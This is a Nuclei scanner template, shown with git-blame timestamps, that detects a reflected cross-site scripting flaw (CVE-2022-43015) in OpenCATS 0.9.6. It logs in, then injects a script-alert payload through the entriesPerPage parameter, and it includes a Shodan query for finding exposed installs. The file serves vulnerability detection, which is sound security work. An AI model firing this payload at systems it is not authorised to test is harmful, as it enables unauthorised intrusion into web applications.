nuclei-templates/cves/2022/CVE-2022-43015.yaml

50 lines
1.4 KiB
YAML
Raw Normal View History

2022-10-24 18:55:26 +00:00
id: CVE-2022-43015
info:
2022-10-25 11:40:09 +00:00
name: OpenCATS v0.9.6 - Cross Site Scripting
2022-10-24 18:55:26 +00:00
author: arafatansari
severity: medium
description: |
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the entriesPerPage parameter.
reference:
2022-10-24 20:47:07 +00:00
- https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_entriesPerPage.md
2022-10-25 11:40:09 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-43015
classification:
cve-id: CVE-2022-43015
2022-10-24 20:47:07 +00:00
metadata:
verified: true
shodan-query: title:"OpenCATS"
2022-10-25 11:40:09 +00:00
tags: cve,cve2022,xss,opencats,authenticated
2022-10-24 18:55:26 +00:00
requests:
- raw:
- |
POST /index.php?m=login&a=attemptLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-10-25 11:40:09 +00:00
username={{username}}&password={{password}}
2022-10-24 18:55:26 +00:00
- |
2022-10-24 20:47:32 +00:00
GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
2022-10-24 18:55:26 +00:00
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
2022-10-24 20:47:07 +00:00
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
2022-10-25 11:40:09 +00:00
- 'MySQL Query Failed'
2022-10-24 20:47:07 +00:00
condition: and
2022-10-24 18:55:26 +00:00
- type: word
2022-10-24 20:47:07 +00:00
part: header
2022-10-24 18:55:26 +00:00
words:
2022-10-24 20:47:07 +00:00
- "text/html"
- type: status
status:
- 200